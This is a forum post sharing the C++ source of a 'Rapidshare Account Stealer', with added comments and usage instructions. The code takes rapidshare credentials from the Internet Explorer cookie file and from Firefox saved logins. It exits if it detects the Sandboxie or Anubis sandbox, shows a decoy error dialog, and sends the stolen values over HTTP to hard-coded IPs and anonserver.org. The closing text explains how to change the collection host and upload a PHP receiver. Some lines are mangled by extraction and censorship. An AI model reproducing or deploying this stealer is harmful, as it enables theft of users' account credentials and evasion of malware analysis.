| Subject: Rapidshare Account Stealer 3.0 Source code 24/2/2010, 2:12 pm | |
| - Code:
-
Changes (1.0 - 2.0): - Removed Firefox for the time being - Rewrote the method of getting Username - Rewrote the method of getting cookie path - Fixed up general bugs. - Working on both Vista and XP
Changes (2.0 - 3.0): - Re-wrote Firefox Module - Fixed up some more general bugs - Code:
-
#include #include #include "FireFaggots.h" #include using namespace std;
#pragma comment (lib, "WS2_32.LIB")
// Process-wide scratch buffers and state flags shared by every routine below.
// szIEID/szIEPass receive the values parsed from the Internet Explorer cookie;
// szUser/szPass receive the values parsed from the Firefox dump (see GetUser/GetPassword).
// bIE is cleared when the IE cookie cannot be read; bVista/bXP are set by CheckOS();
// bFound ends the search loop in FilterFox(). bFF is declared but not used in the visible code.
char szTempBuffer[1024], szBuffer[1024], szProfileini[1024], szName[1024], szCookies[1024], szStrToChar[1024], szPWBuffer[1024]; char szOldName[1024], szIEID[256], szIEPass[256], szUser[50], szPass[50]; int iTemp; bool bIE = true, bFF = true, bVista = false, bXP = false, bFound = false;
// Queries the Windows version with GetVersionEx and records it in the globals:
// version 6.0 sets bVista, version 5.1 sets bXP. Any other version leaves both
// flags false, in which case GatherIEIntelligence() builds no cookie path.
void CheckOS() { OSVERSIONINFO osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if(osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0) { bVista = true; } else if(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) { bXP = true; } }
// Maps one hexadecimal digit character to its numeric value.
// '0'-'9' and 'A'-'F' are handled explicitly; every other character goes through
// the final branch as if it were lowercase 'a'-'f', with no validation.
int RemoveHex(char szTemp) { return( szTemp >= '0' && szTemp <= '9' ? szTemp - '0' : szTemp >= 'A' && szTemp <= 'F' ? szTemp - 'A' + 10 : szTemp - 'a' + 10); }
// Converts the %XX escape sequences found in szInput into bytes written to szOutput,
// using RemoveHex() for each of the two digits. Used on the password half of the
// cookie value in RobInternetExplorer().
void RemoveEscape(char * szInput, char * szOutput) { while(*szInput) { if(*szInput == '%') { *(szOutput++) = 16 * RemoveHex(*++szInput) + RemoveHex(*++szInput); } else { *szInput++; } } }
// Expands the %userprofile% environment variable and stores the resulting
// profile path in the global szName. Despite the name, the value at this point
// is the full profile path; the caller trims it to the last path component.
void GetUsername() { char szTemp[250];
ExpandEnvironmentStrings("%userprofile%", szTemp, sizeof(szTemp)); sprintf(szName, "%s", szTemp); }
// Builds the path of the current user's Internet Explorer cookie file for
// rapidshare and writes it to szOutput.
// Defender note: a non-browser process opening `<user>@rapidshare[1].txt` (or any
// file) in the IE Cookies directory is the host-side behaviour to alert on.
void GatherIEIntelligence(char * szOutput) { GetUsername();
// Keep only the text after the last backslash of the profile path (the account folder name).
for (int i = strlen(szName) + 1; i > 0; i--) { if( szName[i] == '\\') { strcpy(szName, &szName[i + 1]); break; } }
// szOldName keeps the folder name as-is; szName gets every space replaced by '_'
// for use in the cookie file name.
strcpy(szOldName,szName); if(strstr(szName," ")) { loop: int iLoc = strcspn(szName," "); szName[iLoc] = '_'; if(strstr(szName," ")) { goto loop; } }
// Only the XP and Vista directory layouts are handled; the drive letter C: is hard-coded.
if(bXP) { sprintf(szOutput, "C:\\Documents and Settings\\%s\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); } else if(bVista) { sprintf(szOutput, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windo ws\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); } }
// Reads the rapidshare cookie file located by GatherIEIntelligence() and splits
// its value into an account id (szUser) and a password (szPass).
// The szUser/szPass parameters shadow the globals of the same name; RunAnon() and
// RunClient() pass szIEID/szIEPass here.
// Defender note: on failure the routine shows a decoy error dialog, so a user
// report of an "ERROR 8371" message box is a useful triage indicator.
void RobInternetExplorer(char * szUser, char * szPass) { GatherIEIntelligence(szCookies);
FILE * fFP = fopen(szCookies, "r"); if(!fFP) { goto FalseSwipe; }
// Two reads into the same buffer: only the second line of the file is kept.
fgets(szBuffer, 128, fFP); fgets(szBuffer, 512, fFP);
// Split at the first '-': the text before it is copied to szUser, the text after it
// goes through RemoveEscape() into szPass, and the function returns.
for (iTemp = 0; iTemp < strlen(szBuffer); iTemp++) { if(szBuffer[iTemp] == '-') { RemoveEscape(&szBuffer[iTemp + 1], szPass); szBuffer[iTemp] = '\0'; strcpy(szUser, szBuffer); return; } }
// Reached when the file cannot be opened or no '-' is found: show the decoy dialog
// and clear bIE, which suppresses the network send in RunAnon()/RunClient().
FalseSwipe: MessageBox(NULL, "Windows has experienced an error and needs to close \r this program", "ERROR 8371", MB_OK); bIE = false; }
// Anti-analysis check: returns true when SbieDll.dll (the Sandboxie DLL) is loaded
// in the current process. WinMain exits immediately in that case, so a sample run
// under that sandbox shows no further behaviour; the module lookup itself is the
// observable event.
bool bSandBox() { HMODULE hSandbox; hSandbox = GetModuleHandleA("SbieDll.dll"); if(hSandbox == 0) { return false; } else { return true; } }
// Anti-analysis check: returns true when the logged-on account name is exactly
// "USER" or "CurrentUser". The function name suggests these are the account names
// of the Anubis analysis sandbox; that is not verifiable from this page.
// The local szUser shadows the global of the same name.
bool bAnubis() { char szUser[100]; ZeroMemory(&szUser, sizeof(szUser)); DWORD dwUser = sizeof(szUser); if(GetUserName(szUser, &dwUser) != 0) { if(!lstrcmp("USER", szUser) || !lstrcmp("CurrentUser", szUser)) { return true; } } return false; }
// Collects the Internet Explorer cookie credentials and sends them, together with
// the globals szUser/szPass filled from the Firefox dump, to a hard-coded server.
// Both requests are plain-text HTTP GETs with the credentials in the query string
// (`/rapid/?u=...&p=...`), so they are visible to any proxy or network sensor.
// Detection points visible in this block: destination 66.7.200.3 on TCP/80, the
// Host header `anonserver.org`, and requests that carry only Host and Accept headers.
void RunAnon() { SOCKET s; WSADATA wsadata; SOCKADDR_IN target;
// Sets the OS flags, then fills szIEID/szIEPass from the IE cookie (bIE is cleared on failure).
CheckOS(); RobInternetExplorer(szIEID, szIEPass);
// szBuffer holds the request with the IE values, szTempBuffer the one with the Firefox values.
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szIEID, szIEPass); sprintf(szTempBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szUser, szPass);
// Requests Winsock version 2.2.
WSAStartup(0x0202, &wsadata);
target.sin_family = AF_INET; target.sin_port = htons(80); target.sin_addr.s_addr = inet_addr("66.7.200.3");
s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(s, (SOCKADDR *)&target, sizeof(target));
// Both requests are gated on bIE: nothing is sent when the IE cookie step failed.
if(bIE) { send(s, szBuffer, strlen(szBuffer), 0); send(s, szTempBuffer, strlen(szTempBuffer), 0); }
closesocket(s); WSACleanup(); }
// Variant of RunAnon() that sends only the Internet Explorer values, in one
// plain-text HTTP GET (`/rapid/?u=...&p=...`, Host `anonserver.org`), to a second
// hard-coded address, 94.23.1.171 on TCP/80. The only call to it in WinMain is
// commented out in this listing, so this address is a secondary network indicator.
void RunClient() { SOCKET s; WSADATA wsadata; SOCKADDR_IN target;
CheckOS(); RobInternetExplorer(szIEID, szIEPass);
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szIEID, szIEPass);
// Requests Winsock version 2.2.
WSAStartup(0x0202, &wsadata);
target.sin_family = AF_INET; target.sin_port = htons(80); target.sin_addr.s_addr = inet_addr("94.23.1.171");
s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(s, (SOCKADDR *)&target, sizeof(target));
// Sent only when the IE cookie step left bIE set.
if(bIE) { send(s, szBuffer, strlen(szBuffer), 0); }
closesocket(s); WSACleanup(); }
// Copies one line of the Firefox dump into the 50-byte global szUser and keeps
// only the text that starts two characters after the last ':' found.
// Presumably the line has a "label: value" shape; the dump format is produced by
// code that is not on this page.
void GetUser(string szInput) { const char *szUserBuffer;
std::string szTemp = szInput; szUserBuffer = szTemp.c_str(); sprintf(szUser, "%s", szUserBuffer);
// Backward scan for ':'; the value is taken from index i + 2.
for (int i = strlen(szUser) + 1; i > 0; i--) { if( szUser[i] == ':') { strcpy(szUser, &szUser[i + 2]); break; } } }
// Same processing as GetUser(), applied to the password line: the line is copied
// into the 50-byte global szPass and trimmed to the text that starts two
// characters after the last ':' found.
void GetPassword(string szInput) { const char *szPassBuffer;
std::string szTemp = szInput; szPassBuffer = szTemp.c_str(); sprintf(szPass, "%s", szPassBuffer);
// Backward scan for ':'; the value is taken from index t + 2.
for (int t = strlen(szPass) + 1; t > 0; t--) { if( szPass[t] == ':') { strcpy(szPass, &szPass[t + 2]); break; } } }
// Searches the text file C:\Rapid.txt for the entry of https://ssl.rapidshare.com
// and hands the following lines to GetUser() and GetPassword().
// Defender note: C:\Rapid.txt holds recovered credentials in clear text and is a
// host artifact to look for. Presumably it is written by DumpCache() from the
// header that is not shown on this page.
// The identifiers containing **** were censored by the forum software.
void FilterFox() { ifstream Rapid**** ("C:\\Rapid.txt"); string ****Nipples;
// After the matching site line: one line is skipped, the next goes to GetUser(),
// the one after that to GetPassword(); bFound then ends the loop.
if(Rapid****.is_open()) { while (!bFound) { getline(Rapid****, ****Nipples); if(****Nipples == "https://ssl.rapidshare.com") { getline(Rapid****, ****Nipples); getline(Rapid****, ****Nipples); GetUser(****Nipples); getline(Rapid****, ****Nipples); GetPassword(****Nipples); bFound = true; } } Rapid****.close(); } }
// Drives the Firefox part: locates the profile and the Firefox library directory,
// initialises NSS against the profile, dumps the stored-login files and then
// parses the result with FilterFox().
// GetFFProfilePath, GetFFLibPath, DirectoryExists, InitFFLibs,
// InitializeNSSLibrary, DumpCache and NSSUnload come from the project header and
// are not shown on this page, so their exact behaviour is not verifiable here.
// Defender note: a process other than Firefox loading the NSS libraries from the
// Firefox directory and reading signons.txt / signons2.txt / signons3.txt in a
// profile is the behaviour to alert on.
void GetFox() { char *ProfilePath = NULL; char *FFDir = NULL;
ProfilePath = GetFFProfilePath();
// NOTE(review): as pasted, the closing brace of this empty check sits behind `//`;
// the original line layout was lost in extraction.
if( !DirectoryExists(ProfilePath)) { // }
FFDir = GetFFLibPath();
// This second check tests ProfilePath again rather than FFDir.
if( !DirectoryExists(ProfilePath)) { // }
if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); NSSUnload(); } }
FilterFox(); }
// Entry point. Exits at once when either anti-analysis check (bSandBox, bAnubis)
// returns true; otherwise runs the Firefox collection (GetFox) and then the
// network send (RunAnon). The RunClient() call is commented out.
// There is no window, persistence or other activity in the visible code, so the
// process lifetime is short: file reads followed by one outbound TCP/80 connection.
// NOTE(review): as pasted, everything after `//RunClient();` on this line is inside
// the comment; the original line layout was lost in extraction.
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { if(bSandBox()) { return 0; } if(bAnubis()) { return 0; } else { GetFox(); RunAnon(); //RunClient(); } return 0; }
phph file! Code: Code:
This is source code of a stealer - you need to compile it first. In CODE block you will find code for two files - c++ program and php script. First you have to copy c++ part, change path stealer connects to in - Code:
-
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szIEID, szIEPass); sprintf(szTempBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szUser, szPass); In default values it sends passwords to anonserver.org/rapid ( -< isn't .php extension missing here?..) Then you have to upload php script ( part that starts with " Credits goes to Spidy for making this source. |